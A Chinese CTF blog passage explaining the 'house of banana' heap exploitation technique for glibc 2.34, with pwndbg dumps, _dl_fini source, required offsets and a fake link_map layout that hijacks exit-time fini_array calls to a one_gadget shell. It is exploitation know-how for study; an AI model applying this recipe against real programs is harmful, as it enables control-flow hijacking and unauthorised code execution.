<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p *(<span class="keyword">struct</span> link_map *)<span class="number">0x7f56e43ba220</span></span><br><span class="line">$<span class="number">3</span> = &#123;</span><br><span class="line">  l_addr = <span class="number">94172888551424</span>,</span><br><span class="line">  l_name = <span class="number">0x7f56e43ba7c8</span> <span class="string">&quot;&quot;</span>,</span><br><span class="line">  l_ld = <span class="number">0x55a655922000</span>,</span><br><span class="line">  l_next = <span class="number">0x7f56e43ba7d0</span>,			<span class="comment">//#3</span></span><br><span class="line">  l_prev = <span class="number">0x0</span>,							</span><br><span class="line">  l_real = <span class="number">0x7f56e43ba220</span>,			<span class="comment">//#3</span></span><br><span class="line">  l_ns = <span class="number">0</span>,</span><br><span class="line">  l_libname = <span class="number">0x7f56e43ba7b0</span>,</span><br><span class="line">  l_info = &#123;<span class="number">0x0</span>, <span class="number">0x55a655922010</span>, <span class="number">0x55a6559220f0</span>, <span class="number">0x55a6559220e0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922090</span>, <span class="number">0x55a6559220a0</span>, <span class="number">0x55a655922120</span>, <span class="number">0x55a655922130</span>, <span class="number">0x55a655922140</span>, <span class="number">0x55a6559220b0</span>, <span class="number">0x55a6559220c0</span>, <span class="number">0x55a655922020</span>, <span class="number">0x55a655922030</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922100</span>, <span class="number">0x55a6559220d0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922110</span>, <span class="number">0x55a655922160</span>, <span class="number">0x55a655922040</span>, <span class="number">0x55a655922060</span>, <span class="number">0x55a655922050</span>, <span class="number">0x55a655922070</span>, <span class="number">0x55a655922000</span>, <span class="number">0x55a655922150</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922180</span>, <span class="number">0x55a655922170</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922160</span>, <span class="number">0x0</span>, <span class="number">0x55a6559221a0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x55a655922190</span>, <span class="number">0x0</span> &lt;repeats <span class="number">25</span> times&gt;, <span class="number">0x55a655922080</span>&#125;,			<span class="comment">//#4</span></span><br><span class="line">  l_phdr = <span class="number">0x55a65591d040</span>,</span><br><span class="line">......</span><br><span class="line">  l_direct_opencount = <span class="number">1</span>,</span><br><span class="line">  l_type = lt_executable,</span><br><span class="line">  l_relocated = <span class="number">1</span>,</span><br><span class="line">  l_init_called = <span class="number">1</span>,					<span class="comment">//#5</span></span><br><span class="line">  l_global = <span class="number">1</span>,</span><br><span class="line">......</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>我们需要关注的：</p>
<p>​    #3，l_next &#x3D; 0x7f56e43ba7d0, ，指向下一个link_map 的指针，我们就是通过修改这个，将下一个节点劫持为我们伪造的link_map</p>
<p>​    #4 , l_real &#x3D; 0x7f56e43ba220 ,,指向的的自身的地址，这里也是后面需要检查的地方。</p>
<p>​    #5,  l_init_called &#x3D; 1,简单说，就是为了绕过检查。</p>
<p>下面是_dl_fini函数的源码（我已经删除了部分注释及代码，源码路径为glibc2.34&#x2F;elf&#x2F;dl-fini。c）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span></span><br><span class="line">_dl_fini (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">...</span><br><span class="line">	  <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">maps</span>[<span class="title">nloaded</span>];</span>				</span><br><span class="line"></span><br><span class="line">	  <span class="type">unsigned</span> <span class="type">int</span> i;</span><br><span class="line">	  <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l</span>;</span></span><br><span class="line">	  assert (nloaded != <span class="number">0</span> || GL(dl_ns)[ns]._ns_loaded == <span class="literal">NULL</span>);</span><br><span class="line">	  <span class="keyword">for</span> (l = GL(dl_ns)[ns]._ns_loaded, i = <span class="number">0</span>; l != <span class="literal">NULL</span>; l = l-&gt;l_next)</span><br><span class="line">	    <span class="comment">/* Do not handle ld.so in secondary namespaces.  */</span></span><br><span class="line">	    <span class="keyword">if</span> (l == l-&gt;l_real)						<span class="comment">//检查节点的地址是否跟自己结构体保存的一致</span></span><br><span class="line">	      &#123;</span><br><span class="line">		assert (i &lt; nloaded);</span><br><span class="line"></span><br><span class="line">		maps[i] = l;</span><br><span class="line">		l-&gt;l_idx = i;</span><br><span class="line">		++i;</span><br><span class="line"></span><br><span class="line">		<span class="comment">/* Bump l_direct_opencount of all objects so that they</span></span><br><span class="line"><span class="comment">		   are not dlclose()ed from underneath us.  */</span></span><br><span class="line">		++l-&gt;l_direct_opencount;</span><br><span class="line">	      &#125;</span><br><span class="line">	  assert (ns != LM_ID_BASE || i == nloaded);</span><br><span class="line">	  assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - <span class="number">1</span>);</span><br><span class="line">	  <span class="type">unsigned</span> <span class="type">int</span> nmaps = i;</span><br><span class="line"></span><br><span class="line">	  _dl_sort_maps (maps + (ns == LM_ID_BASE), nmaps - (ns == LM_ID_BASE),</span><br><span class="line">			 <span class="literal">NULL</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">	  __rtld_lock_unlock_recursive (GL(dl_load_lock));</span><br><span class="line"></span><br><span class="line">	  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; nmaps; ++i)</span><br><span class="line">	    &#123;</span><br><span class="line">	      <span class="class"><span class="keyword">struct</span> <span class="title">link_map</span> *<span class="title">l</span> =</span> maps[i];			<span class="comment">//l遍历link_map的链表</span></span><br><span class="line"></span><br><span class="line">	      <span class="keyword">if</span> (l-&gt;l_init_called)					<span class="comment">//重要的检查点</span></span><br><span class="line">		&#123;</span><br><span class="line">		  l-&gt;l_init_called = <span class="number">0</span>;						</span><br><span class="line"></span><br><span class="line">		  <span class="comment">/* Is there a destructor function?  */</span></span><br><span class="line">		  <span class="keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="literal">NULL</span></span><br><span class="line">		      || (ELF_INITFINI &amp;&amp; l-&gt;l_info[DT_FINI] != <span class="literal">NULL</span>))</span><br><span class="line">		    &#123;</span><br><span class="line">		      <span class="comment">/* When debugging print a message first.  */</span></span><br><span class="line">		      <span class="keyword">if</span> (__builtin_expect (GLRO(dl_debug_mask)</span><br><span class="line">					    &amp; DL_DEBUG_IMPCALLS, <span class="number">0</span>))</span><br><span class="line">			_dl_debug_printf (<span class="string">&quot;\ncalling fini: %s [%lu]\n\n&quot;</span>,</span><br><span class="line">					  DSO_FILENAME (l-&gt;l_name),</span><br><span class="line">					  ns);</span><br><span class="line"></span><br><span class="line">		      <span class="comment">/* First see whether an array is given.  */</span></span><br><span class="line">		      <span class="keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="literal">NULL</span>)</span><br><span class="line">			&#123;</span><br><span class="line">			  ElfW(Addr) *<span class="built_in">array</span> =</span><br><span class="line">			    (ElfW(Addr) *) (l-&gt;l_addr</span><br><span class="line">					    + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);</span><br><span class="line">			  <span class="type">unsigned</span> <span class="type">int</span> i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val</span><br><span class="line">					    / <span class="keyword">sizeof</span> (ElfW(Addr)));</span><br><span class="line">			  <span class="keyword">while</span> (i-- &gt; <span class="number">0</span>)</span><br><span class="line">			    ((<span class="type">fini_t</span>) <span class="built_in">array</span>[i]) ();					<span class="comment">//目标位置</span></span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">....</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>总结下我们需要绕过那些检查</p>
<ol>
<li><p>判断<code>_ns_loaded</code>链表中至少有三个节点（dl-fini开始部分通过循环遍历链表，做检查，）</p>
</li>
<li><p>检查<code>l == l-&gt;l_real</code></p>
</li>
<li><p>检查<code>l-&gt;l_init_called &gt; 8</code>           这个其实跟数据的处理有关</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> <span class="type">int</span> l_relocated:<span class="number">1</span>;	<span class="comment">/* Nonzero if object&#x27;s relocations done.  */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> l_init_called:<span class="number">1</span>; <span class="comment">/* Nonzero if DT_INIT function called.  */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> l_global:<span class="number">1</span>;	<span class="comment">/* Nonzero if object in _dl_global_scope.  */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> l_reserved:<span class="number">2</span>;	<span class="comment">/* Reserved for internal use.  */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> l_phdr_allocated:<span class="number">1</span>; <span class="comment">/* Nonzero if the data structure pointed</span></span><br><span class="line"><span class="comment">					to by `l_phdr&#x27; is allocated.  */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> l_soname_added:<span class="number">1</span>; <span class="comment">/* Nonzero if the SONAME is for sure in</span></span><br></pre></td></tr></table></figure>

<p>在lunk_map结构体中，这个变量是4字节，与结构体开始位置的偏移量为0x31c。pwndbg帮我们解释了数据的结果，这里的数据要大于8，我们不妨之际设置为9.不同节点可以有所差异，下面是一个结果为1 的数据</p>
<p><img src="/.com//myBLOG\blog\source_posts\高版本glibc堆的几种利用手法\p4-16559541718384.png" alt="image-20220601031113224"></p>
<p>以及一个不为1 的数据</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p *(<span class="keyword">struct</span> link_map *)<span class="number">0x7f56e43ba7d0</span></span><br><span class="line">$<span class="number">5</span> = &#123;</span><br><span class="line">  l_addr = <span class="number">140725148598272</span>,</span><br><span class="line">  l_name = <span class="number">0x7ffd207e4371</span> <span class="string">&quot;linux-vdso.so.1&quot;</span>,</span><br><span class="line">  l_ld = <span class="number">0x7ffd207e43e0</span>,</span><br><span class="line">  l_next = <span class="number">0x7f56e4382000</span>,</span><br><span class="line">  l_prev = <span class="number">0x7f56e43ba220</span>,</span><br><span class="line">  l_real = <span class="number">0x7f56e43ba7d0</span>,</span><br><span class="line">...</span><br><span class="line">  l_relocated = <span class="number">1</span>,</span><br><span class="line">  l_init_called = <span class="number">0</span>,</span><br><span class="line">  l_global = <span class="number">0</span>,</span><br><span class="line">...</span><br><span class="line">pwndbg&gt; x/wx <span class="number">0x7f56e43ba7d0</span>+<span class="number">0x31c</span></span><br><span class="line"><span class="number">0x7f56e43baaec</span>:	<span class="number">0x00000005</span></span><br><span class="line">pwndbg&gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure>


</li>
<li><p>检查<code>l-&gt;l_info[DT_FINI_ARRAY] != NULL</code>，unsigned int i &#x3D; (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val</p>
</li>
</ol>
<p>​    DT_FINI_ARRAY宏定义为26，DT_FINI_ARRAYSZ宏定义为28，所以l_info[26],以及l_info[28]不能是null(28是因为i会影响到函数 ((fini_t) array[i]) ();调用)</p>
<p>下面我们具体说说如何伪造，我选择利用修改第三节点的l_next指针，指向一个chunk,并在chunk上部署我们伪造的link_map.这里依赖任意地址写，可通过largebin attack实现，或者其他漏洞造成的可以任意地址写堆地址。第三节点的指针在哪？_rtld_global符号并不在libc文件，而是在ld.so文件中，我们要泄露出程序的ld基址，pwndbg为我们提供了一个函数求偏移量</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; distance &amp;_rtld_global &amp;(_rtld_global._dl_ns._ns_loaded-&gt;l_next-&gt;l_next-&gt;l_next)</span><br><span class="line"><span class="number">0x7f56e43b9040</span>-&gt;<span class="number">0x7f56e4382018</span> is <span class="number">-0x37028</span> bytes (<span class="number">-0x6e05</span> words)</span><br></pre></td></tr></table></figure>

<p>由此我们就知道了需要向哪里写入chunk.</p>
<p>接下来就是重点，我们如何伪造link_map.</p>
<p>因为原来的链表中只有4个节点，而我们伪造的link_map有恰是第四个，所以，l_next就是0，l_prve无所谓，直接写0即可。l_real就是我们的伪造的link_map的开始地址，也是我们修改后的第三节点的l_next的值。这几个值离link_map的首地址很近，可以很直接的看出偏移量。接下来就是l_info的伪造。l_info[26]不为0，这是结构体内的数组，distance可以得到info[26] info[28]关于节点地址的偏移量，同样我们可以得到上面提到的l_init_called的偏移量</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; distance _rtld_global._dl_ns._ns_loaded &amp;_rtld_global._dl_ns._ns_loaded-&gt;l_info[<span class="number">26</span>]</span><br><span class="line"><span class="number">0x7f56e43ba220</span>-&gt;<span class="number">0x7f56e43ba330</span> is <span class="number">0x110</span> bytes (<span class="number">0x22</span> words)</span><br><span class="line">pwndbg&gt; distance _rtld_global._dl_ns._ns_loaded &amp;_rtld_global._dl_ns._ns_loaded-&gt;l_info[<span class="number">28</span>]</span><br><span class="line"><span class="number">0x7f56e43ba220</span>-&gt;<span class="number">0x7f56e43ba340</span> is <span class="number">0x120</span> bytes (<span class="number">0x24</span> words)</span><br><span class="line">pwndbg&gt; distance _rtld_global._dl_ns._ns_loaded &amp;_rtld_global._dl_ns._ns_loaded-&gt;l_init_called</span><br><span class="line"><span class="number">0x7f56e43ba220</span>-&gt;<span class="number">0x7f56e43ba53c</span> is <span class="number">0x31c</span> bytes (<span class="number">0x63</span> words)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>重点来了，info这连个位置我们写入什么数据</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">  l_info = &#123;<span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x55a656f072f8</span>, <span class="number">0x8</span>, <span class="number">0x7f56e4244cec</span> &lt;__execvpe+<span class="number">652</span>&gt;, <span class="number">0xa</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x55a656f072e0</span>, <span class="number">0x0</span>, <span class="number">0x55a656f072e8</span>, <span class="number">0xa</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x9</span>, <span class="number">0xa</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x41</span>, <span class="number">0x0</span>, <span class="number">0x0</span>, <span class="number">0x0</span>&#125;,</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//</span></span><br><span class="line">  <span class="keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="literal">NULL</span>)</span><br><span class="line">			&#123;</span><br><span class="line">			  ElfW(Addr) *<span class="built_in">array</span> =</span><br><span class="line">			    (ElfW(Addr) *) (l-&gt;l_addr+ l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);</span><br><span class="line">			  <span class="type">unsigned</span> <span class="type">int</span> i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val/ <span class="keyword">sizeof</span> (ElfW(Addr)));</span><br><span class="line">			  <span class="keyword">while</span> (i-- &gt; <span class="number">0</span>)</span><br><span class="line">			    ((<span class="type">fini_t</span>) <span class="built_in">array</span>[i]) ();					<span class="comment">//目标位置</span></span><br></pre></td></tr></table></figure>

<p>这是一个比较通用的info，0x7f56e4244cec &lt;__execvpe+652&gt;是我们想要执行的函数。</p>
<p>我们再看源码的相关部分，正常情况下，exit使用的就是第四个节点的l_info的数据，也就是使用我们伪造的info。</p>
<p>sizeof (ElfW(Addr)) &#x3D; 8，为了方便解释，我们将这里 l-&gt;l_info[DT_FINI_ARRAYSZ]的数据记为ptr，ptr-&gt;d_un.d_ptr,其实就是ptr+0x8所指向的数据。ptr是我们要伪造的数据，他是堆中的一个可控制的位置。我们想要执行一次就可以获得shell，我们不妨让i &#x3D;1,然后我们需要在ptr+8的位置写入的就是1*8&#x3D;8</p>
<p>我们还要确定的是arry数组。(l-&gt;l_addr+ l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);</p>
<p>l-&gt;addr其实就是我们伪造的link_map开始的位置，个人喜欢将这里写为0，然后将l_info[26]写入另外一个地址，两者加起来就是数组的初始位置。我们记录这个地址为ptr_a,这个就会给arry赋值，然后    arry[i]    &#x3D;&#x3D;&#x3D;&#x3D;&gt;&gt;  就是调用ptr_a +8*i 位置的函数。也就是我们的后门。</p>
<p>提供一个构造的布局，</p>
<p>在<code>fake+0x110</code>写入一个ptr_a，且ptr_a+0x8处有ptr，ptr处写入的是最后要执行的函数地址.</p>
<p>在<code>fake+0x120</code>写入一个ptr，且ptr+0x8处是<code>i*8</code>。</p>
<p>我选择的是<code>fake+0x110</code>写入<code>fake+0x40</code>，在<code>fake+0x48</code>写入<code>fake+0x58</code>，在<code>fake+0x58</code>写入shell</p>
<p>我选择在<code>fake+0x120</code>写入<code>fake+0x48</code>，在<code>fake+0x50</code>处写入8.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; tel <span class="number">0x55a656f072a0</span>(fake) <span class="number">40</span></span><br><span class="line"><span class="number">00</span>:<span class="number">0000</span>│  <span class="number">0x55a656f072a0</span> ◂— <span class="number">0x0</span>							<span class="comment">//l_addr</span></span><br><span class="line">... ↓     <span class="number">4</span> skipped</span><br><span class="line"><span class="number">05</span>:<span class="number">0028</span>│  <span class="number">0x55a656f072c8</span> —▸ <span class="number">0x55a656f072a0</span> ◂— <span class="number">0x0</span>				<span class="comment">//l_real</span></span><br><span class="line"><span class="number">06</span>:<span class="number">0030</span>│  <span class="number">0x55a656f072d0</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">07</span>:<span class="number">0038</span>│  <span class="number">0x55a656f072d8</span> ◂— <span class="number">0x41</span> </span><br><span class="line"><span class="number">08</span>:<span class="number">0040</span>│  <span class="number">0x55a656f072e0</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">09</span>:<span class="number">0048</span>│  <span class="number">0x55a656f072e8</span> —▸ <span class="number">0x55a656f072f8</span> —▸ <span class="number">0x7f56e4244cec</span> (execvpe+<span class="number">652</span>) ◂— mov    rdx, r12</span><br><span class="line"><span class="number">0</span>a:<span class="number">0050</span>│  <span class="number">0x55a656f072f0</span> ◂— <span class="number">0x8</span></span><br><span class="line"><span class="number">0b</span>:<span class="number">0058</span>│  <span class="number">0x55a656f072f8</span> —▸ <span class="number">0x7f56e4244cec</span> (execvpe+<span class="number">652</span>) ◂— mov    rdx, r12</span><br><span class="line"><span class="number">0</span>c:<span class="number">0060</span>│  <span class="number">0x55a656f07300</span> ◂— <span class="number">0xa</span> /</span><br><span class="line"><span class="number">0</span>d:<span class="number">0068</span>│  <span class="number">0x55a656f07308</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">0</span>e:<span class="number">0070</span>│  <span class="number">0x55a656f07310</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">0f</span>:<span class="number">0078</span>│  <span class="number">0x55a656f07318</span> ◂— <span class="number">0x41</span></span><br><span class="line"><span class="number">10</span>:<span class="number">0080</span>│  <span class="number">0x55a656f07320</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓     <span class="number">6</span> skipped</span><br><span class="line"><span class="number">17</span>:<span class="number">00b</span>8│  <span class="number">0x55a656f07358</span> ◂— <span class="number">0x41</span></span><br><span class="line"><span class="number">18</span>:<span class="number">00</span>c0│  <span class="number">0x55a656f07360</span> ◂— <span class="number">0x0</span></span><br><span class="line">... ↓     <span class="number">6</span> skipped</span><br><span class="line"><span class="number">1f</span>:<span class="number">00f</span>8│  <span class="number">0x55a656f07398</span> ◂— <span class="number">0x41</span> </span><br><span class="line"><span class="number">20</span>:<span class="number">0100</span>│  <span class="number">0x55a656f073a0</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">21</span>:<span class="number">0108</span>│  <span class="number">0x55a656f073a8</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">22</span>:<span class="number">0110</span>│  <span class="number">0x55a656f073b0</span> —▸ <span class="number">0x55a656f072e0</span> 	<span class="comment">//l_info[26]</span></span><br><span class="line"><span class="number">23</span>:<span class="number">0118</span>│  <span class="number">0x55a656f073b8</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">24</span>:<span class="number">0120</span>│  <span class="number">0x55a656f073c0</span> —▸ <span class="number">0x55a656f072e8</span>  <span class="comment">//l_info[28]</span></span><br><span class="line"><span class="number">25</span>:<span class="number">0128</span>│  <span class="number">0x55a656f073c8</span> ◂— <span class="number">0xa</span> </span><br><span class="line"><span class="number">26</span>:<span class="number">0130</span>│  <span class="number">0x55a656f073d0</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">27</span>:<span class="number">0138</span>│  <span class="number">0x55a656f073d8</span> ◂— <span class="number">0x41</span> </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>最后我们就是利用onegadget获得shell了。</p>
<p>利用gdb万能必挂点，结合one_gadget工具帮助我们快速找到合适的one_gadget</p>
<p><img src="/.com//myBLOG\blog\source_posts\高版本glibc堆的几种利用手法\p5-16559541718385.png" alt="img"></p>
<h5 id="一些注意点："><a href="#一些注意点：" class="headerlink" title="一些注意点："></a>一些注意点：</h5><p>​    因为_rtld_global 这个符号是存在与ld.so文件中，往往出题人不会给出ld.so文件，，rtld_global_ptr与libc_base的偏移在本地与远程并不是固定的，可能会在地址的第2字节处发生变化，因此可以爆破256种可能得到远程环境的精确偏移</p>
<h2 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h2><p>​        本文主要就是介绍我们常用的手法，在高版本的利用情况，主要关注的是在较新版本 Glibc-2.34 0ubuntu3.2的可行性。因为2.34主要问题还是在于一些hook函数被禁止，以及对_IO_str_finish、_IO_str_overflow变化的影响，导致我们可以利用的点是在是很少了。但是这其实对于各位ctfer来讲，因为方法很少，导致攻击手法比较的单一，只有那么几个可以使用。在3.2版本之前，我们依旧可以通过修改vtable劫持控制流，或者攻击’exit_hook’(这个叫法可能会不太严谨，因为并不是一个hook的符号，而是其他的符号)。house of kiwi,攻击exit_hook依旧是可以实现，且比较方便的。</p>
<p>​    后面我这里主要介绍了house of banana,这项技术，依旧是用于3.2，并且向下兼容。简要概括，就是修改第三个节点的l_next为堆地址fake，并在该堆上伪造第四个节点。</p>
<p>伪造link_map</p>
<ol>
<li>​                 *(fake+0x28)&#x3D;fake。</li>
<li>​                *(fake +0x48)&#x3D;fake+0x58,   *(fake+0x50) &#x3D; 0x8</li>
<li>​                *(fake+0x58) &#x3D; shell</li>
<li>​                *(fake+0x110) &#x3D; fake+0x40</li>
<li>​                *(fake+0x120) &#x3D; fake+0x48</li>
<li>​                (int)*(fake+0x31c) &#x3D; 0x9</li>
</ol>
<p>最后笔者在这里提出一个未完成的验证，house of emma 在3.2版本下的利用.</p>
<p>​        因为个人实力依旧比较菜，文章出可能会出现错误及不足，欢迎斧正。也希望能和对此文感兴趣的师傅进一步交流关于新版本的利用姿势。</p>
<p>​    [参考]：</p>
<p>​    想到验证各种姿势，感谢<a target="_blank" rel="noopener" href="https://ruan777.github.io/">ru7n</a>师傅</p>
<p>​    3.2下攻击exit_hook的思考，感谢<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46483787?type=blog">Ayaka</a>师傅</p>
<p>​    house of banana 的最初构想    感谢<a target="_blank" rel="noopener" href="https://www.anquanke.com/member/146878">ha1vk</a> 师傅</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="http://link.hhtjim.com/163/425570952.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link"
		data-enable="false"
        data-ae="false"
        data-ci=""
        data-cs=""
        data-r=""
        data-o=""
        data-a=""
        data-d="false"
    >查看评论</div>


    </div>
    
        <div class="side">
